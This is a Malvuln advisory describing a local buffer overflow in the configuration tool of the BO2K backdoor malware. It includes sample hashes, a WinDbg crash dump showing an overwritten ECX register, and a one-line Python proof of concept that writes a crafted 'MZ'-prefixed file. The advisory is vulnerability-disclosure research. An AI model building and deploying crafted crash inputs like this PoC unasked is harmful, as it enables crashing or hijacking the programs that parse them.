Backdoor.Win32.BO2K.ab Buffer Overflow

Backdoor.Win32.BO2K.ab malware suffers from a buffer overflow vulnerability.


MD5 | 5841f3755afe2d24405abcde392b1f87

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/ca4e5a6ff033b62fa59de5a5dd24c7f9.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BO2K.ab
Vulnerability: Local File Buffer Overflow
Description: PsyConf - Program configuration tool doesnt properly check the executables it parses. Loading a specially crafted file triggers a buffer overflow overwriting ECX register etc.
Type: PE32
MD5: ca4e5a6ff033b62fa59de5a5dd24c7f9
Vuln ID: MVID-2021-0119
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 03/02/2021

Memory Dump:
(414.e80): Unknown exception - code c000041d (first/second chance not available)
eax=001c0000 ebx=023655c0 ecx=41414141 edx=00000000 esi=0019fe0c edi=74de3cf0
eip=00401e17 esp=0019f3c0 ebp=0019f604 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
*** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17:
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h] ds:002b:415d4191=????????


0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h]

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00401e17 (Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x00001e17)
ExceptionCode: c000041d
ExceptionFlags: 00000001
NumberParameters: 0

PROCESS_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe

ERROR_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback.

EXCEPTION_CODE: (NTSTATUS) 0xc000041d - An unhandled exception was encountered during a user callback.

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000e80

BUGCHECK_STR: APPLICATION_FAULT_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 0040ff6f to 00401e17

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f604 0040ff6f 0019fe0c 000003e8 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1e17
0019f634 004103af 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0xff6f
0019f658 00412819 000003e8 00000000 00000000 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x103af
0019f6a8 00412258 00000000 000a07fe 0019fe0c Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12819
0019f724 0041220a 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x12258
0019f744 00411325 00000111 000003e8 000a07fe Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1220a
0019f7a4 0041152d 00000000 001307ba 00000111 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x11325
0019f7c0 761147ab 001307ba 00000111 000003e8 Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x1152d
0019f7ec 760f52ac 00411502 001307ba 00000111 user32!_InternalCallWinProc+0x2b
0019f8d0 760f4e4a 00411502 00000000 00000111 user32!UserCallWinProcCheckWow+0x3ac
0019f934 760fe4cf 00c8edc0 00000000 00000111 user32!DispatchClientMessage+0xea
0019f970 770e537d 0019f98c 00000020 0019fc5c user32!__fnDWORD+0x3f
0019f9a8 76052c0c 760f4c18 001307ba 00000111 ntdll!KiUserCallbackDispatcher+0x4d
0019f9ac 760f4c18 001307ba 00000111 000003e8 win32u!NtUserMessageCall+0xc
0019fa10 760f4723 00c8edc0 00000000 000a07fe user32!SendMessageWorker+0x3b8
0019fa44 761303ee 001307ba 00000111 000003e8 user32!SendMessageW+0x123
0019fa68 761300f3 00ca0690 00000000 00000000 user32!xxxButtonNotifyParent+0x54
0019fa90 7612f5f8 004ed7f0 00000000 00ca0690 user32!xxxBNReleaseCapture+0x141
0019fb30 7612ea92 00ca0690 00000000 00000202 user32!ButtonWndProcWorker+0xad8
0019fb5c 761147ab 000a07fe 00000202 00000000 user32!ButtonWndProcA+0x52
0019fb88 760f52ac 7612ea40 000a07fe 00000202 user32!_InternalCallWinProc+0x2b
0019fc6c 760f43fe 7083c410 00007ffb 00000202 user32!UserCallWinProcCheckWow+0x3ac
0019fce0 760f8401 00000000 004205e8 004205e0 user32!DispatchMessageWorker+0x20e
0019fd14 76110d5e 001307ba 004205e0 004205e0 user32!IsDialogMessageW+0x101
0019fd40 00413a80 001307ba 004205e0 0019fe0c user32!IsDialogMessageA+0x4e
004205e0 00000000 00000000 00140028 4a60bbbc Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+0x13a80


FOLLOWUP_IP:
Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17
00401e17 8b540150 mov edx,dword ptr [ecx+eax+50h]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9

IMAGE_NAME: Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 396c698b

STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

FAILURE_BUCKET_ID: FILL_PATTERN_41414141_c000041d_Backdoor.Win32.BO2K.ab.ca4e5a6ff033b62fa59de5a5dd24c7f9.exe!Unknown

BUCKET_ID: APPLICATION_FAULT_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_ab_ca4e5a6ff033b62fa59de5a5dd24c7f9+1e17


Exploit/PoC:
python -c "print( 'MZ'+'A'*72000)" > dirty0tis.exe


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Related Posts